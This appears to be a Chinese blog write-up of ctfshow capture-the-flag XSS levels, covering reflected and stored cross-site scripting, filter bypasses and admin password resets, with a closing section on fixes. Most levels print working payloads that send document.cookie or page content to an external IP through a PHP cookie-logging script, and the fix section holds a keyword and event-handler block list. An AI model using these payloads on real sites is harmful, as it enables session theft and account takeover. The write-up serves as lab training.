WEB攻防-通用漏洞_XSS跨站_绕过修复_http_only_CSP

xss-toc" style="margin-left:0px;">1、关卡361 - 反射型xss

2、关卡317 - 过滤标签

3、关卡318 319 - 过滤标签

4、关卡320--326 - 过滤空格和尖括号

5、关卡327 - 存储型跨站

6、关卡328

7、关卡329 - 失效凭据需1步完成所需操作

8、关卡330 - 存储型-借助修改密码URL重置管理员密码（GET方式提交修改密码）

9、关卡331 - post提交修改密码

修复方案

1.字符过滤

2、httponly过滤

3、CSP安全策略

4、其它防止跨站的策略

下面是ctfshow的关卡

xss" style="background-color:transparent;">1、关卡361 - 反射型xss

在文本框中输入123，页面中就出现123；即，在输入框中输入什么，页面中就会出现什么

测试：输入“<script>alert(1)</script>”是否会出现弹窗

测试结果：出现弹窗，说明存在跨站xss漏洞

怎么去获取这个flag呢，在ctfshow默认会有一个机器人，生成好跨站地址后，机器人会自动去访问地址触发跨站，然后让管理员把他的cookie发送出来，作为考题，flag在cookie中。那么应该怎么获取管理员的cookie呢？

首先我们要知道在js中，document.cookie可以获取到当前的cookie，和window.location.href是跳转到url，通过这两个内部函数去让浏览器给我们发送cookie，只要打开我们构造的URL就让发生cookie到我们服务器中。所以我们要先准备一个api接收从目标网站返回的cookie信息

在自己的服务器建一个get.php

# get.php
<?php 
$cookie=$_GET['c']; 
$myfile = fopen("cookie.txt", "w+"); 
fwrite($myfile, $cookie); 
fclose($myfile); 
?>

构造跨站语句： <script>window.location.href='http://47.100.167.248/get.php?c='+document.cookie</script>

在输入框输入跨站语句，点击“生成链接”，当机器人去触发，就可以获取到flag了

2、关卡317 - 过滤标签

上一关的跨站语句：<script>window.location.href='http://47.100.167.248/get.php?c='+document.cookie</script>

在输入框输入前一关的跨站语句，点击“生成链接”，发现网站没有反应，页面没有显示js语句，浏览器也没有跳转，但是正常的输入123这样的，shi没问题的，通过尝试发现输入的语句中只要出现了<script>，网站就会对其进行过滤，那么我们把<script>标签换成其它的标签

常见的绕过，参考文章：https://xz.aliyun.com/t/4067

比如把script标签换成img标签，如<img src=1 onerror=alert("xss");>

测试：在输入框中输入img标签的跨站语句，点击“生成链接”，结果弹窗

构造payload：

① <img src=1 οnerrοr=window.location.href='http://47.100.167.248/get.php?c='+document.cookie;> 当图片地址不存在时，触发事件，测试失败，猜测可能图片1是存在

② <input οnlοad="window.location.href='http://47.100.167.248/get.php?c='+document.cookie;"> 失败

③ <body/οnlοad=window.location.href='http://47.100.167.248/get.php?c='+document.cookie;> 成功

这个是什么原因呢？为什么body可以，img不行。其实这是和鼠标事件有关。鼠标事件有错误事件(onerror)，有单击事件(onclick)，指向触发，还有事件会在页面或图像加载完成后立即发生（onload，这个是最好的，不需要任何操作就可触发的）

3、关卡318 319 - 过滤标签

用前面的payload：<img src=adf οnlοad=window.location.href='http://47.100.167.248/get.php?c='+document.cookie> 一样也是被过滤了，

然后用到input标签：<input οnlοad="alert('xss');"> 构造payload： <input οnlοad="window.location.href='http://47.100.167.248/get.php?c='+document.cookie;">没反应?换一个

用svg标签构造payload： <svg οnlοad="window.location.href='http://47.100.167.248/get.php?c='+document.cookie;"> 页面跳转成功，成功获取到cookie和flag

4、关卡320--326 - 过滤空格和尖括号

通过测试，发现过滤了空格和<>，只要有空格或尖括号都不行

考虑绕过空格，用/代替空格 <img/src="x"/οnerrοr=alert("xss");>

构造payload： <svg/οnlοad="window.location.href='http://47.100.167.248/get.php?c='+document.cookie;"> 页面跳转成功，成功获取到flag

5、关卡327 - 存储型跨站

将跨站语句写到邮件内容中，邮件发送成功后，对方打开邮件就会触发跨站

信的内容写跨站语句：<script>window.location.href='http://47.100.167.248/get.php?c='+document.cookie</script> 收件人要写上admin。

6、关卡328

这一关出现了注册登录查看等操作，直接登录自己的账号，因为不是管理员，页面中的用户名和密码不让显示

思路： 后台管理员能够查看注册用户的账号密码，如果我注册账号时，将自己的账号或密码改为js代码，注册后js代码被存储到数据库中，当管理员查看这个账号管理的页面时，会不会触发js代码，触发了JavaScript代码后，我就可以获取到管理员的cookie值，然后可以进行用户的查看。

构造payload： <script>window.location.href='http://47.100.167.248/get.php?c='+document.cookie</script>

获取到管理员cookie：sessionID

用burp抓包，修改cookie的值，实现admin登录，查看到所有账户信息：

7、关卡329 - 失效凭据需1步完成所需操作

在页面和上一关一样，所以同理，可以用到上一关的payload来获取cookie的值， <script>window.location.href='http://47.100.167.248/get.php?c='+document.cookie</script> 可以获取到cookie，但是用获取的cookie一直登录不成功，因为收到的cookie可能每10s就刷新一次，机器人刚把cookie发过来，它就退出登录，cookie就失效了

那么应该怎么处理这个问题呢？思路：xss跨站代码，可以获取到页面的cookie的值，也可以获取到当前页面的源代码。上一关显示源码中的flag位置，在页面密码下的第一行。查看元素，看看是什么标识这个变量

可以看出，是layui-table-cell laytable-cell-1-0-1的标签标识了管理员可见，那么就构造payload，在触发XSS跨站代码的时候将“ctfshow{xxxxx}”中的flag值发送到指定位置。

在xss平台上也有这个功能，但是一直都不能成功 https://xss8.cc/

自己写JS代码获取值

<script>$('.laytable-cell-1-0-1').each(function(index,value){if(value.innerHTML.indexOf('ctf'+'show')>-1){//没找到索引就返回-1    window.location.href='http://47.100.167.248/get.php?c='+value.innerHTML;     } 
});
</script>

注册时，JS语句写在代码处，然后登录：

直接获取到flag的值：

8、关卡330 - 存储型-借助修改密码URL重置管理员密码（GET方式提交修改密码）

修改密码页面，经过抓包分析，得知，只要是登录状态，修改密码只需要访问/api/change.php?p=111111这个接口地址，就能把成功修改密码。

这个地址修改的密码是谁的密码呢？是当前登录用户；如果管理员登录了后台，同时查看了用户的注册密码信息，就可以尝试重置密码。

攻击思路：注册用户时，填写的用户名或密码是可以跳转到修改密码URL的JS代码，注册成功后，注册信息被写入数据库，只要管理员登录后台并查看了这个用户密码管理页面，就可以触发JS代码的执行，自动跳转重置密码URL，并重置管理员的密码。

构造payload：

实际操作改为：<script> src='http://127.0.0.1/api/change.php?p=123';</script> //最好用src，浏览器不会明显地跳转到指定页面，而是悄悄地触发这个地址

注册账户时，用户名和密码处都填写为JS代码（因为不知道用户名和密码哪一个可以触发JS代码）：

等待机器人触发JS代码后，管理员密码被修改成功，这样就可以用admin、123成功登录管理员账号了：

9、关卡331 - post提交修改密码

同样是修改密码的地方，但是是post提交数据，抓包分析

那么应该怎么使用JavaScript来进行post提交数据呢？

构造payload：

注册时，用户名和密码处填写注入语句：

JS代码被触发后，用admin登录，就可以得到flag

修复方案

1.字符过滤

自定义过滤函数：检测输入的xss代码，一旦检测到关键字，就过滤

过滤一些危险字符，以及转义& < > " ' 等危险字符

# 自定义过滤函数function RemoveXSS($val) {// remove all non-printable characters. CR(0a) and LF(0b) and TAB(9) are allowed// this prevents some character re-spacing such as <java\0script>// note that you have to handle splits with \n, \r, and \t later since they *are* allowed in some inputs$val = preg_replace('/([\x00-\x08,\x0b-\x0c,\x0e-\x19])/', '', $val);// straight replacements, the user should never need these since they're normal characters// this prevents like <IMG SRC=@avascript:alert('XSS')>$search = 'abcdefghijklmnopqrstuvwxyz';$search .= 'ABCDEFGHIJKLMNOPQRSTUVWXYZ';$search .= '1234567890!@#$%^&*()';$search .= '~`";:?+/={}[]-_|\'\\';for ($i = 0; $i < strlen($search); $i++) {// ;? matches the ;, which is optional// 0{0,7} matches any padded zeros, which are optional and go up to 8 chars// @ @ search for the hex values$val = preg_replace('/(&#[xX]0{0,8}'.dechex(ord($search[$i])).';?)/i', $search[$i], $val); // with a ;// @ @ 0{0,7} matches '0' zero to seven times$val = preg_replace('/(&#0{0,8}'.ord($search[$i]).';?)/', $search[$i], $val); // with a ;}// 检测xss语句中常见的关键字 now the only remaining whitespace attacks are \t, \n, and \r$ra1 = array('javascript', 'vbscript', 'expression', 'applet', 'meta', 'xml', 'blink', 'link', 'script', 'embed', 'object', 'iframe', 'frame', 'frameset', 'ilayer', 'layer', 'bgsound', 'title');$ra2 = array('onabort', 'onactivate', 'onafterprint', 'onafterupdate', 'onbeforeactivate', 'onbeforecopy', 'onbeforecut', 'onbeforedeactivate', 'onbeforeeditfocus', 'onbeforepaste', 'onbeforeprint', 'onbeforeunload', 'onbeforeupdate', 'onblur', 'onbounce', 'oncellchange', 'onchange', 'onclick', 'oncontextmenu', 'oncontrolselect', 'oncopy', 'oncut', 'ondataavailable', 'ondatasetchanged', 'ondatasetcomplete', 'ondblclick', 'ondeactivate', 'ondrag', 'ondragend', 'ondragenter', 'ondragleave', 'ondragover', 'ondragstart', 'ondrop', 'onerror', 'onerrorupdate', 'onfilterchange', 'onfinish', 'onfocus', 'onfocusin', 'onfocusout', 'onhelp', 'onkeydown', 'onkeypress', 'onkeyup', 'onlayoutcomplete', 'onload', 'onlosecapture', 'onmousedown', 'onmouseenter', 'onmouseleave', 'onmousemove', 'onmouseout', 'onmouseover', 'onmouseup', 'onmousewheel', 'onmove', 'onmoveend', 'onmovestart', 'onpaste', 'onpropertychange', 'onreadystatechange', 'onreset', 'onresize', 'onresizeend', 'onresizestart', 'onrowenter', 'onrowexit', 'onrowsdelete', 'onrowsinserted', 'onscroll', 'onselect', 'onselectionchange', 'onselectstart', 'onstart', 'onstop', 'onsubmit', 'onunload');$ra = array_merge($ra1, $ra2);$found = true; // keep replacing as long as the previous round replaced somethingwhile ($found == true) {$val_before = $val;for ($i = 0; $i < sizeof($ra); $i++) {$pattern = '/';for ($j = 0; $j < strlen($ra[$i]); $j++) {if ($j > 0) {$pattern .= '(';$pattern .= '(&#[xX]0{0,8}([9ab]);)';$pattern .= '|';$pattern .= '|(&#0{0,8}([9|10|13]);)';$pattern .= ')*';}$pattern .= $ra[$i][$j];}$pattern .= '/i';$replacement = substr($ra[$i], 0, 2).'<x>'.substr($ra[$i], 2); // add in <> to nerf the tag$val = preg_replace($pattern, $replacement, $val); // filter out the hex tagsif ($val_before == $val) {// no replacements were made, so exit the loop$found = false;}}}return $val;
}